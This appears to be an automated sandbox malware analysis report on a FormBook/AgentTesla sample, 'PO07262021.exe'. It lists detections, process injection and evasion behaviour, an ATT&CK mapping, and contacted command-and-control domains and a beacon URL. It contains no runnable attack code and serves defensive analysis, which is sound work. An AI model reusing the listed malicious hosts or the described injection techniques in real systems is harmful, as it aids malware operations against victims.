          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E7513 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,15_2_011E7513
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D443C GetVersion,15_2_011D443C
          Source: C:\Users\user\Desktop\PO07262021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Scheduled Task/Job1Valid Accounts1Valid Accounts1Rootkit1Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Scheduled Task/Job1Access Token Manipulation1Masquerading1LSASS MemorySecurity Software Discovery241Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection612Valid Accounts1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Scheduled Task/Job1Access Token Manipulation1NTDSVirtualization/Sandbox Evasion31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDisable or Modify Tools1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection612DCSyncSystem Information Discovery125Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information31Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing2/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 458795 Sample: PO07262021.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for dropped file 2->50 52 7 other signatures 2->52 10 PO07262021.exe 7 2->10         started        process3 file4 32 C:\Users\user\AppData\...\FzGSUpCvLNF.exe, PE32 10->32 dropped 34 C:\Users\...\FzGSUpCvLNF.exe:Zone.Identifier, ASCII 10->34 dropped 36 C:\Users\user\AppData\Local\...\tmpB7D9.tmp, XML 10->36 dropped 38 C:\Users\user\AppData\...\PO07262021.exe.log, ASCII 10->38 dropped 62 Uses schtasks.exe or at.exe to add and modify task schedules 10->62 64 Tries to detect virtualization through RDTSC time measurements 10->64 66 Injects a PE file into a foreign processes 10->66 14 PO07262021.exe 10->14         started        17 schtasks.exe 1 10->17         started        signatures5 process6 signatures7 68 Modifies the context of a thread in another process (thread injection) 14->68 70 Maps a DLL or memory area into another process 14->70 72 Sample uses process hollowing technique 14->72 74 Queues an APC in another process (thread injection) 14->74 19 explorer.exe 14->19 injected 23 conhost.exe 17->23         started        process8 dnsIp9 40 www.winabeel.com 19->40 42 www.ppneumatic.com 19->42 44 winabeel.com 34.102.136.180, 49763, 80 GOOGLEUS United States 19->44 54 System process connects to network (likely due to code injection or exploit) 19->54 25 cmd.exe 19->25         started        signatures10 process11 signatures12 56 Modifies the context of a thread in another process (thread injection) 25->56 58 Maps a DLL or memory area into another process 25->58 60 Tries to detect virtualization through RDTSC time measurements 25->60 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO07262021.exe59%VirustotalBrowse
          PO07262021.exe11%MetadefenderBrowse
          PO07262021.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          PO07262021.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe11%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.PO07262021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          winabeel.com2%VirustotalBrowse
          www.winabeel.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cnD0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.winabeel.com/nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0p0%Avira URL Cloudsafe
          www.cryptoinhindi.online/nmks/0%Avira URL Cloudsafe
          https://static.hummingbird.me/anime/poster_images/000/010/716/large/0fd8df1b586e60a0b1591cd8555c072f0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          winabeel.com
          		34.102.136.180
          		truefalseunknown
          www.winabeel.com
          		unknown
          		unknowntrueunknown
          www.ppneumatic.com
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.winabeel.com/nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0pfalse
            • Avira URL Cloud: safe
            		unknown
            www.cryptoinhindi.online/nmks/true
            • Avira URL Cloud: safe
            		low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
              		high
              http://www.fontbureau.comexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.com/designersGexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                      		high
                      http://www.tiro.comexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                        		high
                        http://www.goodfont.co.krexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.carterandcone.comlexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnDPO07262021.exe, 00000000.00000003.647203244.000000000116D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sajatypeworks.comexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://fontfabrik.comexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cnexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8explorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                              		high
                              http://www.%s.comPAexplorer.exe, 00000009.00000000.735427722.0000000002B50000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		low
                              http://www.fonts.comexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://i.imgur.com/blkrqBo.gifPO07262021.exefalse
                                  		high
                                  https://static.hummingbird.me/anime/poster_images/000/010/716/large/0fd8df1b586e60a0b1591cd8555c072fPO07262021.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  34.102.136.180
                                  		winabeel.comUnited States
                                  		15169GOOGLEUSfalse

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:458795
                                  Start date:03.08.2021
                                  Start time:18:51:07
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 1s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:PO07262021.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@10/4@2/1
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 13.4% (good quality ratio 13.1%)
                                  • Quality average: 79.7%
                                  • Quality standard deviation: 24.1%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 32
                                  • Number of non-executed functions: 284
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.113.196.254, 168.61.161.212, 20.50.102.62, 52.114.132.73, 13.107.5.88, 13.107.42.23, 23.211.5.146, 13.88.21.125, 23.211.6.115, 104.42.151.234, 20.82.210.154, 67.26.73.254, 8.253.207.120, 8.248.117.254, 8.248.137.254, 8.248.115.254, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.209.183
